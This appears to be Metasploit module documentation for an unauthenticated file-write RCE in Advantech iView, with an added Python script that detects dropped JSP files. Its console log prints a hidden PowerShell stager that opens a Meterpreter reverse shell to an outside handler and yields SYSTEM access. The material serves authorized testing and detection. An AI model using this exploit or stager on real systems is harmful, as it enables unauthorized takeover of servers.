Vulnerable Application
This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\SYSTEM.
The exploit functions by first modifying a configuration value to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.
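The chain described above leaves one durable artifact on disk: a JSP file with a random name dropped into the iView webroot (the module's own cleanup warning later on this page names webapps\iView3\<random>.jsp). The following is an added defender-side example, not part of this module or of Advantech's product, that walks a Tomcat webapps directory and flags JSP files that are not in a known-good baseline, carry a random-looking name, or were modified after the install. The baseline names and the sample directory listing are constructed for illustration; a real baseline must be taken from a clean install.

```python
import os
import re
from datetime import datetime

# Constructed baseline: JSP files assumed to ship with the iView web application.
# Replace with a listing taken from a clean install of the same version.
KNOWN_GOOD_JSP = {"index.jsp", "login.jsp", "error.jsp"}

# The dropped stub seen on this page has a 30-character alphanumeric name;
# flag anything that looks like that (20-40 alphanumerics, .jsp extension).
RANDOM_NAME_RE = re.compile(r"^[A-Za-z0-9]{20,40}\.jsp$")


def flag_suspicious_jsp(entries, baseline=KNOWN_GOOD_JSP, install_time=None):
    """entries: iterable of (relative_path, mtime_datetime).

    Returns a list of (relative_path, [reasons]) for JSP files worth a look.
    Non-JSP files are ignored. mtime is only considered when install_time
    is given; files touched at or before install_time are not flagged for it.
    """
    findings = []
    for path, mtime in entries:
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        if not name.lower().endswith(".jsp"):
            continue
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        if RANDOM_NAME_RE.match(name):
            reasons.append("random-looking filename")
        if install_time is not None and mtime > install_time:
            reasons.append("modified after install")
        if reasons:
            findings.append((path, reasons))
    return findings


def collect_jsp_entries(webapps_root):
    """Walk a real Tomcat webapps directory and yield (relative_path, mtime)
    tuples in the shape flag_suspicious_jsp expects."""
    for dirpath, _dirs, files in os.walk(webapps_root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, webapps_root)
            yield rel, datetime.fromtimestamp(os.path.getmtime(full))


# Constructed sample listing, mirroring the path from the transcript on this
# page plus a few ordinary files. Timestamps are invented.
INSTALL_TIME = datetime(2021, 1, 15, 9, 0)
SAMPLE_ENTRIES = [
    ("iView3\\index.jsp", datetime(2021, 1, 15, 9, 0)),
    ("iView3\\login.jsp", datetime(2021, 1, 15, 9, 0)),
    ("iView3\\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp", datetime(2021, 3, 22, 15, 1)),
    ("iView3\\WEB-INF\\web.xml", datetime(2021, 1, 15, 9, 0)),
    ("iView3\\report.jsp", datetime(2021, 2, 1, 12, 0)),
]

if __name__ == "__main__":
    # Offline demo on the constructed listing; swap in
    # collect_jsp_entries(r"C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\webapps")
    # to scan a live host.
    for path, reasons in flag_suspicious_jsp(SAMPLE_ENTRIES, install_time=INSTALL_TIME):
        print(f"{path}: {', '.join(reasons)}")
```

Run against the constructed listing, the dropped stub trips all three checks, report.jsp trips the baseline and mtime checks (a legitimate customization would be added to the baseline after review), and web.xml is skipped as a non-JSP file. The baseline comparison is the check that matters; the name and mtime heuristics only help prioritize.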
Setup (Windows)
- Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.
- The installer contains the necessary dependencies. This guide outlines the steps necessary for configuring each of them.
- Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:
  - Copy the msvcr100.dll file from C:\Program Files (x86)\Java\jre7\bin to C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin.
  - Restart the "Apache Tomcat 6" service.
- At this point, the application should be listening on port 8080 and no additional configuration is necessary.
Verification Steps
- Install the application (see the "Setup" section)
- Start msfconsole
- Do: use exploit/windows/http/advantech_iview_unauth_rce
- Set the RHOST and PAYLOAD options as applicable
- Do: run
- You should get a shell.
Scenarios
Windows 10 v1909 x64 running Advantech iView 5.7.0002.5992
msf6 exploit(windows/http/advantech_iview_unauth_rce) > set RHOSTS 192.168.159.30
RHOSTS => 192.168.159.30
msf6 exploit(windows/http/advantech_iview_unauth_rce) > check
[*] 192.168.159.30:8080 - The target appears to be vulnerable.
msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit
[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Retrieving config
[+] Successfully retrieved config
[*] Updating config
[+] Successfully updated config
[*] Writing JSP stub
[+] Successfully wrote JSP stub
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Executing command: cmd.exe /c powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] Restoring config
[+] Successfully restored config
[*] https://192.168.159.128:8443 handling request from 192.168.159.30; (UUID: romk3zgq) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400
[!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target
meterpreter >
[+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-RTCRBEV
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >